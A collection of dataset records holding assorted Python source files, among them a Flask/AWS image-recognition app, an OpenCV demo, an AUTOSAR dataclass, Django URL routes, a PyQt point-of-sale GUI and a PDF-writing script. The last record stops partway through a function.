+{"seq_id":"398190753","text":"import boto3\r\nfrom pathlib import Path\r\nfrom flask import Flask, request\r\nfrom werkzeug.utils import secure_filename\r\nimport json\r\nimport urllib.parse\r\nfrom botocore.exceptions import ClientError\r\n\r\n\r\napp = 
Flask(__name__)\r\n\r\nS3_BUCKET = \"serverless-staircase-images\"\r\nS3_UPLOAD_KEY_NAME = \"{filename}\"\r\nDYNAMODB_TABLE = \"serverless_images_table\"\r\n\r\nAWS_ACCESS_KEY = \"\"\r\nAWS_SECRET_ACCESS_KEY = \"\"\r\n\r\nALLOWED_EXTENSIONS = {\"png\", \"jpg\", \"jpeg\"}\r\nUPLOAD_FOLDER = Path(__file__).resolve().parent\r\n\r\n\r\ndef allowed_file(filename):\r\n return \".\" in filename and \\\r\n filename.rsplit(\".\", 1)[1].lower() in ALLOWED_EXTENSIONS\r\n\r\n\r\n@app.route(\"/upload\", methods=[\"POST\"])\r\ndef upload_image():\r\n \"\"\"Receives a request to upload an image.\"\"\"\r\n # Check if file was uploaded\r\n if \"file\" not in request.files:\r\n return \"No file uploaded\"\r\n\r\n file = request.files[\"file\"]\r\n # Check if file is allowed\r\n if not allowed_file(file.filename):\r\n return \"File extension not allowed\"\r\n\r\n # save file locally\r\n filename = secure_filename(file.filename)\r\n file_path = UPLOAD_FOLDER / filename\r\n file.save(file_path)\r\n\r\n file_key = S3_UPLOAD_KEY_NAME.format(filename=filename)\r\n upload_image_to_s3(file_path, file_key)\r\n\r\n return \"File uploaded successfully!\"\r\n\r\n\r\n@app.route('/get_info/', methods=[\"GET\"])\r\ndef get_image_info(image_name):\r\n db_client = boto3.client('dynamodb', aws_access_key_id=AWS_ACCESS_KEY,\r\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\r\n\r\n table = db_client.Table(DYNAMODB_TABLE)\r\n\r\n try:\r\n response = table.get_item(Key={'id': image_name})\r\n except ClientError as e:\r\n print(e.response['Error']['Message'])\r\n else:\r\n return response['Item']\r\n\r\n\r\ndef upload_image_to_s3(file_loc, s3_key):\r\n s3 = boto3.client(\"s3\", aws_access_key_id=AWS_ACCESS_KEY,\r\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\r\n with open(file_loc, \"rb\") as f:\r\n s3.upload_fileobj(f, S3_BUCKET, s3_key)\r\n\r\n print(f\"Image: {s3_key} uploaded to S3\")\r\n\r\n\r\ndef process_image(event, context):\r\n \"\"\"Lambda function which receives S3 event.\"\"\"\r\n\r\n s3 = boto3.client(\"s3\", aws_access_key_id=AWS_ACCESS_KEY,\r\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\r\n # Get the object from the event and show its content type\r\n bucket = event['Records'][0]['s3']['bucket']['name']\r\n key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')\r\n try:\r\n response_image = s3.get_object(Bucket=bucket, Key=key)\r\n\r\n client = boto3.client('rekognition', aws_access_key_id=AWS_ACCESS_KEY,\r\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\r\n response = client.detect_labels(Image={'S3Object': {'Bucket': bucket, 'Name': key}}, MaxLabels=10)\r\n\r\n db_client = boto3.client('dynamodb', aws_access_key_id=AWS_ACCESS_KEY,\r\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\r\n\r\n str_response = json.dumps(response['Labels'])\r\n\r\n\r\n data = db_client.put_item(\r\n TableName=DYNAMODB_TABLE,\r\n Item={\r\n 'id': {\r\n 'S': key\r\n },\r\n 'image_labels_info': {\r\n 'S': str_response\r\n },\r\n 'image_labels_count': {\r\n 'N': str(len(response['Labels']))\r\n }\r\n })\r\n\r\n response = {\r\n 'statusCode': 200,\r\n 'body': 'successfully created item!',\r\n 'headers': {\r\n 'Content-Type': 'application/json',\r\n 'Access-Control-Allow-Origin': '*'\r\n },\r\n }\r\n\r\n except Exception as e:\r\n print(e)\r\n print('Error getting object {} from bucket {}. 
Make sure they exist and your bucket is in the '\r\n 'same region as this function.'.format(key, bucket))\r\n raise e\r\n","sub_path":"Part 2 - Image Recognition/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"187435898","text":"import os, sys, csv\nfrom SummaryStatistics import SS\n\ndef create_lists(filename):\n file = open(filename)\n num_lines = sum(1 for line in open(filename))\n print(num_lines)\n #users = [None]*(num_lines-1)\n #sessions = [None]*(num_lines-1)\n #events = [None]*(num_lines-1)\n\n users = []\n sessions = []\n events = []\n \n count = -1\n for line in file:\n if count > -1:\n parts = line.split(',')\n time = int(parts[0])\n #users[count] = parts[1]\n #sessions[count] = parts[2]\n #events[count] = parts[3].rstrip('\\n')\n\n users.append(int(parts[1]))\n sessions.append(int(parts[2]))\n events.append(int(parts[3].rstrip('\\n')))\n #time,users[count],sessions[count],events[count] = line.split(',')\n count = count + 1\n file.close()\n return users, sessions, events\n\ndef write_summary(fn,dictionary):\n w = csv.writer(open(fn, \"wb\"))\n for key, val in dictionary.items():\n w.writerow([key,val])\n \nday_user,day_session,day_event = create_lists(\"OSSUsersSessionsEventsByDay20160101-20170930.csv\")\nhour_user,hour_session, hour_event = create_lists(\"OSSUsersSessionsEventsByHour20160101-20170930.csv\")\n\nday_user = SS(day_user)\nday_session = SS(day_session)\nday_event = SS(day_event)\n\nhour_user = SS(hour_user)\nhour_session = SS(hour_session)\nhour_event = SS(hour_event)\n\nwrite_summary('day_user.csv',day_user)\nwrite_summary('day_session.csv',day_session)\nwrite_summary('day_event.csv',day_event)\nwrite_summary('hour_user.csv',hour_user)\nwrite_summary('hour_session.csv',hour_session)\nwrite_summary('hour_event.csv',hour_event)\n#print(day_user)\n","sub_path":"assn5/analyze_files.py","file_name":"analyze_files.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"485906311","text":"from dataclasses import dataclass, field\nfrom typing import List, Optional\nfrom .annotation import (\n AdminData,\n Annotation,\n DocumentationBlock,\n VariationPoint,\n)\nfrom .category_string import CategoryString\nfrom .data_transformation_ref_conditional import DataTransformationRefConditional\nfrom .end_to_end_transformation_i_signal_props import EndToEndTransformationISignalProps\nfrom .i_signal_subtypes_enum import ISignalSubtypesEnum\nfrom .identifier import Identifier\nfrom .multi_language_overview_paragraph import MultiLanguageOverviewParagraph\nfrom .multilanguage_long_name import MultilanguageLongName\nfrom .ref import Ref\nfrom .short_name_fragment import ShortNameFragment\nfrom .someip_transformation_i_signal_props import SomeipTransformationISignalProps\nfrom .system_signal_group_subtypes_enum import SystemSignalGroupSubtypesEnum\nfrom .user_defined_transformation_i_signal_props import UserDefinedTransformationISignalProps\n\n__NAMESPACE__ = \"http://autosar.org/schema/r4.0\"\n\n\n@dataclass\nclass ISignalGroup:\n \"\"\"SignalGroup of the Interaction Layer.\n\n The RTE supports a \"signal fan-out\" where the same System Signal\n Group is sent in different SignalIPdus to multiple receivers. An\n ISignalGroup refers to a set of ISignals that shall always be kept\n together. A ISignalGroup represents a COM Signal Group. 
Therefore it\n is recommended to put the ISignalGroup in the same Package as\n ISignals (see atp.recommendedPackage)\n\n :ivar short_name: This specifies an identifying shortName for the\n object. It needs to be unique within its context and is intended\n for humans but even more for technical reference.\n :ivar short_name_fragments: This specifies how the\n Referrable.shortName is composed of several shortNameFragments.\n :ivar long_name: This specifies the long name of the object. Long\n name is targeted to human readers and acts like a headline.\n :ivar desc: This represents a general but brief (one paragraph)\n description what the object in question is about. It is only one\n paragraph! Desc is intended to be collected into overview\n tables. This property helps a human reader to identify the\n object in question. More elaborate documentation, (in particular\n how the object is built or used) should go to \"introduction\".\n :ivar category: The category is a keyword that specializes the\n semantics of the Identifiable. It affects the expected existence\n of attributes and the applicability of constraints.\n :ivar admin_data: This represents the administrative data for the\n identifiable object.\n :ivar introduction: This represents more information about how the\n object in question is built or is used. Therefore it is a\n DocumentationBlock.\n :ivar annotations: Possibility to provide additional notes while\n defining a model element (e.g. the ECU Configuration Parameter\n Values). These are not intended as documentation but are mere\n design notes.\n :ivar variation_point: This element was generated/modified due to an\n atpVariation stereotype.\n :ivar com_based_signal_group_transformations: This property was\n modified due to atpVariation (DirectedAssociationPattern).\n :ivar i_signal_refs: Reference to a set of ISignals that shall\n always be kept together.\n :ivar system_signal_group_ref: Reference to the SystemSignalGroup\n that is defined on VFB level and that is supposed to be\n transmitted in the ISignalGroup.\n :ivar transformation_i_signal_propss: A transformer chain consists\n of an ordered list of transformers. The ISignalGroup specific\n configuration properties for each transformer are defined in the\n TransformationISignalProps class. The transformer configuration\n properties that are common for all ISignalGroups are described\n in the TransformationTechnology class.\n :ivar s: Checksum calculated by the user's tool environment for an\n ArObject. May be used in an own tool environment to determine if\n an ArObject has changed. The checksum has no semantic meaning\n for an AUTOSAR model and there is no requirement for AUTOSAR\n tools to manage the checksum.\n :ivar t: Timestamp calculated by the user's tool environment for an\n ArObject. May be used in an own tool environment to determine\n the last change of an ArObject. The timestamp has no semantic\n meaning for an AUTOSAR model and there is no requirement for\n AUTOSAR tools to manage the timestamp.\n :ivar uuid: The purpose of this attribute is to provide a globally\n unique identifier for an instance of a meta-class. The values of\n this attribute should be globally unique strings prefixed by the\n type of identifier. For example, to include a DCE UUID as\n defined by The Open Group, the UUID would be preceded by \"DCE:\".\n The values of this attribute may be used to support merging of\n different AUTOSAR models. 
The form of the UUID (Universally\n Unique Identifier) is taken from a standard defined by the Open\n Group (was Open Software Foundation). This standard is widely\n used, including by Microsoft for COM (GUIDs) and by many\n companies for DCE, which is based on CORBA. The method for\n generating these 128-bit IDs is published in the standard and\n the effectiveness and uniqueness of the IDs is not in practice\n disputed. If the id namespace is omitted, DCE is assumed. An\n example is \"DCE:2fac1234-31f8-11b4-a222-08002b34c003\". The uuid\n attribute has no semantic meaning for an AUTOSAR model and there\n is no requirement for AUTOSAR tools to manage the timestamp.\n \"\"\"\n class Meta:\n name = \"I-SIGNAL-GROUP\"\n\n short_name: Optional[Identifier] = field(\n default=None,\n metadata={\n \"name\": \"SHORT-NAME\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n \"required\": True,\n }\n )\n short_name_fragments: Optional[\"ISignalGroup.ShortNameFragments\"] = field(\n default=None,\n metadata={\n \"name\": \"SHORT-NAME-FRAGMENTS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n long_name: Optional[MultilanguageLongName] = field(\n default=None,\n metadata={\n \"name\": \"LONG-NAME\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n desc: Optional[MultiLanguageOverviewParagraph] = field(\n default=None,\n metadata={\n \"name\": \"DESC\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n category: Optional[CategoryString] = field(\n default=None,\n metadata={\n \"name\": \"CATEGORY\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n admin_data: Optional[AdminData] = field(\n default=None,\n metadata={\n \"name\": \"ADMIN-DATA\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n introduction: Optional[DocumentationBlock] = field(\n default=None,\n metadata={\n \"name\": \"INTRODUCTION\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n annotations: Optional[\"ISignalGroup.Annotations\"] = field(\n default=None,\n metadata={\n \"name\": \"ANNOTATIONS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n variation_point: Optional[VariationPoint] = field(\n default=None,\n metadata={\n \"name\": \"VARIATION-POINT\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n com_based_signal_group_transformations: Optional[\"ISignalGroup.ComBasedSignalGroupTransformations\"] = field(\n default=None,\n metadata={\n \"name\": \"COM-BASED-SIGNAL-GROUP-TRANSFORMATIONS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n i_signal_refs: Optional[\"ISignalGroup.ISignalRefs\"] = field(\n default=None,\n metadata={\n \"name\": \"I-SIGNAL-REFS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n system_signal_group_ref: Optional[\"ISignalGroup.SystemSignalGroupRef\"] = field(\n default=None,\n metadata={\n \"name\": \"SYSTEM-SIGNAL-GROUP-REF\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n transformation_i_signal_propss: Optional[\"ISignalGroup.TransformationISignalPropss\"] = field(\n default=None,\n metadata={\n \"name\": \"TRANSFORMATION-I-SIGNAL-PROPSS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n s: Optional[str] 
= field(\n        default=None,\n        metadata={\n            \"name\": \"S\",\n            \"type\": \"Attribute\",\n        }\n    )\n    t: Optional[str] = field(\n        default=None,\n        metadata={\n            \"name\": \"T\",\n            \"type\": \"Attribute\",\n            \"pattern\": r\"([0-9]{4}-[0-9]{2}-[0-9]{2})(T[0-9]{2}:[0-9]{2}:[0-9]{2}(Z|([+\\-][0-9]{2}:[0-9]{2})))?\",\n        }\n    )\n    uuid: Optional[str] = field(\n        default=None,\n        metadata={\n            \"name\": \"UUID\",\n            \"type\": \"Attribute\",\n        }\n    )\n\n    @dataclass\n    class ShortNameFragments:\n        short_name_fragment: List[ShortNameFragment] = field(\n            default_factory=list,\n            metadata={\n                \"name\": \"SHORT-NAME-FRAGMENT\",\n                \"type\": \"Element\",\n                \"namespace\": \"http://autosar.org/schema/r4.0\",\n            }\n        )\n\n    @dataclass\n    class Annotations:\n        annotation: List[Annotation] = field(\n            default_factory=list,\n            metadata={\n                \"name\": \"ANNOTATION\",\n                \"type\": \"Element\",\n                \"namespace\": \"http://autosar.org/schema/r4.0\",\n            }\n        )\n\n    @dataclass\n    class ComBasedSignalGroupTransformations:\n        data_transformation_ref_conditional: List[DataTransformationRefConditional] = field(\n            default_factory=list,\n            metadata={\n                \"name\": \"DATA-TRANSFORMATION-REF-CONDITIONAL\",\n                \"type\": \"Element\",\n                \"namespace\": \"http://autosar.org/schema/r4.0\",\n            }\n        )\n\n    @dataclass\n    class ISignalRefs:\n        i_signal_ref: List[\"ISignalGroup.ISignalRefs.ISignalRef\"] = field(\n            default_factory=list,\n            metadata={\n                \"name\": \"I-SIGNAL-REF\",\n                \"type\": \"Element\",\n                \"namespace\": \"http://autosar.org/schema/r4.0\",\n            }\n        )\n\n        @dataclass\n        class ISignalRef(Ref):\n            dest: Optional[ISignalSubtypesEnum] = field(\n                default=None,\n                metadata={\n                    \"name\": \"DEST\",\n                    \"type\": \"Attribute\",\n                    \"required\": True,\n                }\n            )\n\n    @dataclass\n    class SystemSignalGroupRef(Ref):\n        dest: Optional[SystemSignalGroupSubtypesEnum] = field(\n            default=None,\n            metadata={\n                \"name\": \"DEST\",\n                \"type\": \"Attribute\",\n                \"required\": True,\n            }\n        )\n\n    @dataclass\n    class TransformationISignalPropss:\n        end_to_end_transformation_i_signal_props: List[EndToEndTransformationISignalProps] = field(\n            default_factory=list,\n            metadata={\n                \"name\": \"END-TO-END-TRANSFORMATION-I-SIGNAL-PROPS\",\n                \"type\": \"Element\",\n                \"namespace\": \"http://autosar.org/schema/r4.0\",\n            }\n        )\n        someip_transformation_i_signal_props: List[SomeipTransformationISignalProps] = field(\n            default_factory=list,\n            metadata={\n                \"name\": \"SOMEIP-TRANSFORMATION-I-SIGNAL-PROPS\",\n                \"type\": \"Element\",\n                \"namespace\": \"http://autosar.org/schema/r4.0\",\n            }\n        )\n        user_defined_transformation_i_signal_props: List[UserDefinedTransformationISignalProps] = field(\n            default_factory=list,\n            metadata={\n                \"name\": \"USER-DEFINED-TRANSFORMATION-I-SIGNAL-PROPS\",\n                \"type\": \"Element\",\n                \"namespace\": \"http://autosar.org/schema/r4.0\",\n            }\n        )\n","sub_path":"autosar/models/i_signal_group.py","file_name":"i_signal_group.py","file_ext":"py","file_size_in_byte":12808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"534014231","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import unicode_literals\r\nimport cv2 as cv\r\n\r\noriginal = cv.imread('../ml_data/box.png')\r\ncv.imshow('Original', original)\r\ngray = cv.cvtColor(original, cv.COLOR_BGR2GRAY)\r\ncv.imshow('Gray', gray)\r\ncorners = cv.cornerHarris(gray, 7, 5, 0.04)\r\nmixture = original.copy()\r\n# turn the pixels at the corner positions red\r\nmixture[corners > corners.max() * 0.01] = [0, 0, 255]\r\ncv.imshow('Corner', 
mixture)\r\ncv.waitKey()\r\n\r\n\r\n","sub_path":"aid1901/day7/demo07_corner.py","file_name":"demo07_corner.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"370534334","text":"import media\nimport fresh_tomatoes\n\n# initialize each movie instance\nthe_matrix = media.Movie(\"The Matrix\",\n                         \"The film depicts a dystopian future in which reality\"\n                         \" as perceived by most humans is actually a simulated\"\n                         \" reality called 'The Matrix'\",\n                         \"http://en.wikipedia.org/wiki/The_Matrix\",\n                         \"http://upload.wikimedia.org/wikipedia/en/thumb/c/c1/\"\n                         \"The_Matrix_Poster.jpg/220px-The_Matrix_Poster.jpg\",\n                         \"https://www.youtube.com/watch?v=m8e-FF8MsqU\",\n                         \"March 31, 1999 (USA)\",\n                         \"http://en.wikipedia.org/wiki/The_Matrix#Cast\",\n                         \"R\")\n\nknights_tale = media.Movie(\"A Knight's Tale\",\n                           \"The film follows a peasant who is pretending to be \"\n                           \"a knight, along with his companions, in the world \"\n                           \"of medieval jousting.\",\n                           \"http://en.wikipedia.org/wiki/A_Knight%27s_Tale\",\n                           \"http://upload.wikimedia.org/wikipedia/en/thumb/a/a6\"\n                           \"/AKnightsTale.jpg/220px-AKnightsTale.jpg\",\n                           \"https://www.youtube.com/watch?v=zH6U5y086hw\",\n                           \"May 11, 2001 (USA)\",\n                           \"http://en.wikipedia.org/wiki/A_Knight%27s_Tale#Cast\",\n                           \"PG-13\")\n\nlast_samurai = media.Movie(\"The Last Samurai\",\n                           \"The film portrays a formerly retired officer of \"\n                           \"the US 7th Cavalry Regiment, whose personal and \"\n                           \"emotional conflicts bring him into contact with \"\n                           \"samurai warriors in the wake of the Meiji \"\n                           \"Restoration in 19th Century Japan.\",\n                           \"http://en.wikipedia.org/wiki/The_Last_Samurai\",\n                           \"http://upload.wikimedia.org/wikipedia/en/thumb/c/\"\n                           \"c6/The_Last_Samurai.jpg/220px-The_Last_Samurai.jpg\",\n                           \"https://www.youtube.com/watch?v=_fRJxYynvmw\",\n                           \"December 1, 2003 (USA)\",\n                           \"http://en.wikipedia.org/wiki/The_Last_Samurai#Cast\",\n                           \"R\")\n\n# collect the movie instances in a tuple\nmovies = (the_matrix, knights_tale, last_samurai)\n\n# build and open the movies web page\nfresh_tomatoes.open_movies_page(movies)\n","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"113264785","text":"from django.conf.urls import patterns, url\n\nfrom buybook.orderstudent import views\n\nurlpatterns = patterns('',\n    url(r'^ordering/$',views.order,name='order'),\n    url(r'^myorder/$',views.myorder,name='myorder'),\n    url(r'^refund/$',views.refund,name='refund'),\n    url(r'^quantity/(?P.*)/(?P\\d)/$',views.quantity,name='quantity'),\n    url(r'^add/(?P.*)/$',views.add,name='add'),\n    url(r'^reduce/(?P.*)/$',views.reduce,name='reduce'),\n    url(r'^delete/(?P.*)/$',views.delete,name='delete'),\n)","sub_path":"buybook/buybook/orderstudent/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"578505648","text":"import sys\nfrom PyQt5 import QtWidgets, QtCore, QtGui\n\n\ndef makeButton(text, icon):\n    button = QtWidgets.QToolButton()\n    button.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)\n    button.setIcon(QtGui.QIcon(icon))\n    button.setIconSize(QtCore.QSize(84, 84))\n    button.setText(text)\n    button.setFixedSize(128, 128)\n    return button\n\n\nclass GUI:\n    def __init__(self, data, cart):\n        self.data = data\n        self.cart = cart\n        Main(self)\n\n    # main app\n    app = 
QtWidgets.QApplication(sys.argv)\n\n columnLimit = 10\n\n # main window\n w = QtWidgets.QWidget()\n\n # category list\n categoryList = QtWidgets.QListWidget()\n\n # cart list\n cartList = QtWidgets.QListWidget()\n\n # main layout\n mainLayout = QtWidgets.QGridLayout()\n\n # checkout widgets\n checkoutContainer = QtWidgets.QVBoxLayout()\n checkoutLayout = QtWidgets.QHBoxLayout()\n priceLayout = QtWidgets.QHBoxLayout()\n cashCheckout = makeButton('Cash', 'img/ui/cash.png')\n creditCheckout = makeButton('Credit', 'img/ui/cash.png')\n clearOrder = makeButton('Cancel Order', 'img/ui/delete.png')\n\n # item selection display\n # scrollPort = QtWidgets.QScrollArea()\n # itemWindowLayout = QtWidgets.QGridLayout()\n # itemWindowWidget = QtWidgets.QWidget()\n # itemList = QtWidgets.QListWidget()\n itemTable = QtWidgets.QTableWidget(10, 10)\n # scrollPort.setWidget(itemList)\n\n # price labels\n totalPrice = QtWidgets.QLabel('Total: $5.00')\n totalTax = QtWidgets.QLabel('Tax: $1.25')\n\n # function buttons\n manageButtonLayout = QtWidgets.QHBoxLayout()\n settingsButton = makeButton('Settings', 'img/ui/settings.png')\n transactionsButton = makeButton('Transactions', 'img/ui/transactions.png')\n editCategoriesButton = makeButton('Edit Categories', 'img/ui/editCategories.png')\n editItemsButton = makeButton('Edit Items', 'img/ui/editItems.png')\n editAddonsButton = makeButton('Edit Add-ons', 'img/ui/editAddons.png')\n openDrawerButton = makeButton('Open Drawer', 'img/ui/drawer.png')\n refreshButton = makeButton('Refresh UI', 'img/ui/refresh.png')\n\n\ndef populateItemList(self):\n rows = 0\n columns = 0\n for item in self.data.items:\n if columns == self.columnLimit:\n rows += 1\n columns = 0\n button = makeButton(item.getName(), item.getThumbnail())\n self.itemTable.setCellWidget(rows, columns, button)\n columns += 1\n\n # item1 = self.data.items[0]\n # item2 = self.data.items[1]\n # button1 = makeButton(item1.getName(), item1.getThumbnail())\n # button2 = makeButton(item2.getName(), item2.getThumbnail())\n # itemListButton1 = QtWidgets.QListWidgetItem(self.itemList)\n # itemListButton2 = QtWidgets.QListWidgetItem(self.itemList)\n # self.itemList.setItemWidget(itemListButton1, button1)\n # self.itemList.setItemWidget(itemListButton2, button2)\n\ndef populateCategoryList(self):\n for category in self.data.categories:\n item = QtWidgets.QListWidgetItem(category)\n\n item.setTextAlignment(QtCore.Qt.AlignCenter)\n self.categoryList.addItem(item)\n\n\ndef resetCategories(self):\n self.categoryList.clear()\n populateCategoryList(self)\n\ndef resetItemList(self):\n populateItemList(self)\n\n\ndef refresh(self):\n resetCategories(self)\n resetItemList(self)\n print(\"refresh\")\n\n\ndef formatGUI(self):\n self.w.show()\n # w.showFullScreen()\n self.w.setWindowTitle('Py-Pos')\n self.w.setWindowIcon(QtGui.QIcon('img/ui/logo.png'))\n\n # format the category bar\n self.categoryList.setStyleSheet(\"QListWidget {padding: 0px;} QListWidget::item { margin: 30px; }\")\n self.categoryList.setFlow(QtWidgets.QListView.LeftToRight)\n self.categoryList.setFixedHeight(128)\n populateCategoryList(self)\n\n # format the cart list\n self.cartList.setStyleSheet(\"QListWidget {padding: 0px;} QListWidget::item { margin: 30px; }\")\n self.cartList.setMaximumWidth(508)\n self.cartList.setMinimumWidth(256)\n\n # format the item display\n # self.itemList.setFlow(QtWidgets.QListView.LeftToRight)\n # self.itemList.setViewMode(QtWidgets.QListView.IconMode)\n # self.itemList.setResizeMode(QtWidgets.QListView.Adjust)\n # 
self.itemList.setGridSize(QtCore.QSize(128, 128))\n # self.itemList.setSpacing(10)\n\n self.itemTable.horizontalHeader().setDefaultSectionSize(128)\n self.itemTable.verticalHeader().setDefaultSectionSize(128)\n self.itemTable.horizontalHeader().setSectionResizeMode(QtWidgets.QHeaderView.Fixed)\n self.itemTable.verticalHeader().setSectionResizeMode(QtWidgets.QHeaderView.Fixed)\n\n\n # format function buttons\n self.manageButtonLayout.addWidget(self.settingsButton)\n self.manageButtonLayout.addWidget(self.transactionsButton)\n self.manageButtonLayout.addWidget(self.editCategoriesButton)\n self.manageButtonLayout.addWidget(self.editItemsButton)\n self.manageButtonLayout.addWidget(self.editAddonsButton)\n self.manageButtonLayout.addWidget(self.openDrawerButton)\n self.manageButtonLayout.addWidget(self.refreshButton)\n\n # format price labels\n self.totalTax.setAlignment(QtCore.Qt.AlignRight)\n self.totalPrice.setAlignment(QtCore.Qt.AlignLeft)\n self.totalPrice.setFont(QtGui.QFont(\"Arial\", 20, QtGui.QFont.ExtraBold))\n self.totalTax.setFont(QtGui.QFont(\"Arial\", 20, QtGui.QFont.ExtraBold))\n\n # format cash, credit, clear buttons\n self.priceLayout.addWidget(self.totalPrice)\n self.priceLayout.addWidget(self.totalTax)\n self.checkoutLayout.addWidget(self.cashCheckout)\n self.checkoutLayout.addWidget(self.creditCheckout)\n self.checkoutLayout.addWidget(self.clearOrder)\n self.checkoutContainer.addLayout(self.priceLayout)\n self.checkoutContainer.addLayout(self.checkoutLayout)\n\n # format the main layout\n self.mainLayout.setSpacing(30)\n # self.mainLayout.addWidget(self.scrollPort, 2, 1)\n self.mainLayout.addWidget(self.itemTable, 2, 1)\n self.mainLayout.addWidget(self.categoryList, 1, 1)\n self.mainLayout.addWidget(self.cartList, 2, 2)\n self.mainLayout.addLayout(self.manageButtonLayout, 3, 1)\n self.mainLayout.addLayout(self.checkoutContainer, 3, 2)\n self.w.setLayout(self.mainLayout)\n\n\ndef attachButtons(self, text):\n print()\n\n\ndef formatSignals(self):\n # link manage buttons\n # self.openDrawerButton.clicked.connect(lambda: self.data.createItem(\"\",\"\", \"cq\", 5, \"lmao\"))\n self.refreshButton.clicked.connect(lambda: refresh(self))\n\n\ndef Main(self):\n formatGUI(self)\n formatSignals(self)\n sys.exit(self.app.exec_())\n","sub_path":"src/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":6523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"396756660","text":"#! 
/usr/bin/python\n# pdf_file.py\n\"\"\"\nThis test script writes the PdfDoc.py file as a pdf file.\n\n\"\"\"\n\nfileName = 'PdfDoc.py'\nfileLocation = '../'\noutputFile = 'PdfDoc.pdf'\n\nfrom PdfDoc import PdfDocument\n\nwith open(fileLocation + fileName,\"r\") as f: \n\tlines=f.readlines()\n\t\n\t\n\t\ndef beginReport():\t\n\tp = PdfDocument()\n\tp.beginDoc( outputFile )\n\tp.setLineHeightFactor(1.0)\n\tp.setDefaultUnit('r')\n\tp.setDefaultFont('F1',8)\n\treturn p\n\t\n\ndef beginPage(p):\n\tp.newPage()\n\tp.setFont('F1B',12)\n\tp.writeCenteredInLine( 1, 'PdfDoc.py')\n\tp.setFont('F1',8)\n\tp.setCurrentRow(3)\n\n\ndef printLine(p,line):\n\tif line.strip().startswith('def ') or line.strip().startswith('class '):\n\t\tp.setFont('F1B',8)\n\t\tp.writeCol(3,line,'l')\n\t\tp.setFont('F1',8)\n\n\telse:\n\t\tp.writeCol(3,line,'l')\n\tp.setCurrentRow( p.getCurrentRow() + 1)\n\n\t\ndef endPage(p):\n\tp.setFont('F1I',6)\n\tp.write(1, p.getBottomRow(), 'PdfDoc.py','l')\n\tp.write( p.getLineWidth(), p.getBottomRow(),'Page '+str(p.getPageNumber()),'r')\n\tp.endPage()\n\t\n\np = beginReport()\n\nfor line in lines:\n\tif p.page is None:\n\t\tbeginPage(p)\n\t\n\tprintLine(p, line)\n\t\n\tif p.getFreeRows() < 3:\n\t\tendPage(p)\n\t\t\t\np.endDoc()\nprint( \"Check output \" + outputFile )\t\n\t\t\n","sub_path":"tests/pdf_file.py","file_name":"pdf_file.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"309742629","text":"import pickle\nimport random\n\ndef main():\n    frame_to_lex = pickle.load(open(\"./cache/russian_params.pickle\", \"rb\"))\n    frame_to_lex['Policy Prescription and Evaluation'].remove('и')\n\n    frame_to_set_words = {}\n    frame_to_draw_words = {}\n    for f in frame_to_lex:\n        if f == \"Other\":\n            continue\n\n        # randomly sample 105 words from the frame:\n        # the first 75 become 15 sets of 5,\n        # the rest serve as intruder candidates for other frames\n        frame_words = random.sample(frame_to_lex[f], 105)\n        frame_to_set_words[f] = frame_words[:75]\n\n        frame_to_draw_words[f] = frame_words[75:]\n\n\n    # build the word sets, drawing one intruder per set\n    samples = []\n    answers = []\n    for f in frame_to_lex:\n        if f == \"Other\":\n            continue\n\n        sets = frame_to_set_words[f]\n\n        random.shuffle(sets)\n        my_lex = frame_to_lex[f]\n\n        # identify which frames we can draw from; we can't draw from ones\n        # that have overlapping words\n        frames_to_draw_intruder = []\n        for f_sample in frame_to_lex:\n            if f_sample == \"Other\":\n                continue\n            other_lex = frame_to_lex[f_sample]\n\n            skip = False\n            for word in other_lex:\n                if word in my_lex:\n                    skip = True\n                    break\n            if not skip:\n                frames_to_draw_intruder += frame_to_draw_words[f_sample]\n\n        